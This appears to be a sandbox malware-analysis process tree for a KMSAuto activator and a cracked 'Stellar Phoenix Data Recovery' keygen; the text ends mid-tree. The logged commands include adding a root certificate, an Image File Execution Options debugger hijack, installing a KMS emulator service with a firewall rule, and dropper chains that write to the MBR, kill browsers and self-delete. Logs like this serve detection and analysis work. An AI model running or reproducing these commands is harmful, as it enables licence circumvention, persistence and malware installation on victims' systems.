    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
[3] C:\Windows\system32\ROUTE.EXE
    route -p add 100.100.0.10 0.0.0.0 IF 1
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
[3] C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
    FakeClient.exe 100.100.0.10
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
    - Modifies data under HKEY_USERS
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
[3] C:\Windows\system32\ROUTE.EXE
    route delete 100.100.0.10 0.0.0.0
[2] C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c taskkill /t /f /IM FakeClient.exe
[3] C:\Windows\SysWOW64\taskkill.exe
    taskkill /t /f /IM FakeClient.exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete WinDivert1.1
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop KMSEmulator
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete KMSEmulator
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
[3] C:\Windows\system32\reg.exe
    reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
    - Modifies registry key
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
[2] C:\Windows\System32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\wzt.dat
    wzt.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
[3] C:\ProgramData\KMSAuto\wzt\certmgr.exe
    certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
[3] C:\ProgramData\KMSAuto\wzt\certmgr.exe
    certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin.dat
    bin.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
[3] C:\ProgramData\KMSAuto\bin\AESDecoder.exe
    AESDecoder.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
[3] C:\ProgramData\KMSAuto\bin_x64.dat
    bin_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
[3] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
[4] C:\Windows\system32\NETSTAT.EXE
    netstat -ano
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken
[4] C:\Windows\system32\find.exe
    find ":1688 "
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" start KMSEmulator
[2] C:\Windows\SysWOW64\net.exe
    net stop sppsvc /y
[3] C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sppsvc /y
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
[3] C:\Windows\System32\taskkill.exe
    taskkill /t /f /IM SppExtComObj.Exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c SppPatcher_x64.dat -y -pkmsauto
[3] C:\Users\Admin\AppData\Local\Temp\SppPatcher_x64.dat
    SppPatcher_x64.dat -y -pkmsauto
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "SppPatcher_x64.dat"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjPatcher.exe C:\Windows\System32\SppExtComObjPatcher.exe /Y
    - Drops file in System32 directory
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjHook.dll C:\Windows\System32\SppExtComObjHook.dll /Y
    - Drops file in System32 directory
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "Debugger" /t REG_SZ /d "SppExtComObjPatcher.exe"
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "KMS_Emulation" /t REG_DWORD /d 0
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f
    - Modifies data under HKEY_USERS
[2] C:\Windows\System32\reg.exe
    C:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe
[3] C:\Windows\system32\taskkill.exe
    taskkill /t /f /IM SppExtComObj.Exe
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c rd "C:\Users\Admin\AppData\Local\Temp\KMSAuto" /S /Q
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjPatcher.exe"
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjHook.dll"
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" stop KMSEmulator
[2] C:\Windows\SysWOW64\sc.exe
    "sc.exe" delete KMSEmulator
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
[3] C:\Windows\system32\reg.exe
    reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f
    - Modifies registry key
[2] C:\Windows\System32\Netsh.exe
    C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
[2] C:\Windows\System32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q
[2] C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "kmsauto.ini"
[1] C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x418
    - Suspicious use of AdjustPrivilegeToken
[1] C:\ProgramData\KMSAuto\bin\KMSSS.exe
    "C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
    - Executes dropped EXE
[1] C:\ProgramData\KMSAuto\bin\KMSSS.exe
    "C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP
    - Executes dropped EXE
[1] C:\Windows\system32\SppExtComObjPatcher.exe
    SppExtComObjPatcher.exe C:\Windows\system32\SppExtComObj.exe -Embedding
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
[2] C:\Windows\system32\SppExtComObj.exe
    C:\Windows\system32\SppExtComObj.exe -Embedding
    - Loads dropped DLL
    - Modifies data under HKEY_USERS
[3] C:\Windows\System32\SLUI.exe
    "C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;Trigger=TimerEvent
[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe
    "C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion\Stellar.Phoenix.Data.Recovery.crack.by.orion.exe"
    - Executes dropped EXE
[2] C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
[3] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    - Executes dropped EXE
[4] C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
[5] C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
    C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
    - Executes dropped EXE
[3] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    - Executes dropped EXE
[3] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    - Executes dropped EXE
[4] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
[5] C:\Windows\SysWOW64\PING.EXE
    ping 1.1.1.1 -n 1 -w 3000
    - Runs ping.exe
[3] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    - Executes dropped EXE
[4] C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
    - Executes dropped EXE
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies system certificate store
[5] C:\Windows\SysWOW64\msiexec.exe
    msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
[5] C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
    C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
    - Executes dropped EXE
[6] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
[7] C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    - Kills process with taskkill
[6] C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
[7] C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 3
    - Runs ping.exe
[5] C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
    C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
    - Executes dropped EXE
    - Checks SCSI registry key(s)
[6] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
[6] C:\Users\Admin\AppData\Roaming\1615300462900.exe
    "C:\Users\Admin\AppData\Roaming\1615300462900.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300462900.txt"
[6] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
[6] C:\Users\Admin\AppData\Roaming\1615300467412.exe
    "C:\Users\Admin\AppData\Roaming\1615300467412.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300467412.txt"
[6] C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
[6] C:\Users\Admin\AppData\Roaming\1615300472849.exe
    "C:\Users\Admin\AppData\Roaming\1615300472849.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615300472849.txt"
[6] C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
    C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
[6] C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
    "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
[5] C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
[6] C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 3
    - Runs ping.exe
[4] C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
    - Executes dropped EXE
    - Modifies system certificate store
[5] C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
[6] C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    - Kills process with taskkill
[4] C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
[5] C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
[6] C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 1 3.1615300258.604786a24b096 101
[7] C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe
    "C:\Users\Admin\AppData\Local\Temp\1Z2ZWGIRFP\multitimer.exe" 2 3.1615300258.604786a24b096
[8] C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe
    "C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT
[9] C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-ENE8H.tmp\syrdykki5r2.tmp" /SL5="$501F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\ljr15ejdiac\syrdykki5r2.exe" /VERYSILENT
[10] C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe
    "C:\Users\Admin\AppData\Local\Temp\is-CF5BJ.tmp\winlthst.exe" test1 test1
[8] C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe
    "C:\Users\Admin\AppData\Local\Temp\hjy3rs4wttj\uqclxdwfafi.exe" testparams
[9] C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe
    "C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams
[10] C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-UC7M0.tmp\gnbvzrskz3i.tmp" /SL5="$701F2,552809,216064,C:\Users\Admin\AppData\Roaming\kr10jnzk02c\gnbvzrskz3i.exe" /VERYSILENT /p=testparams
[8] C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe
    "C:\Users\Admin\AppData\Local\Temp\dha0lfa4gl1\askinstall24.exe"
[9] C:\Windows\SysWOW64\cmd.exe
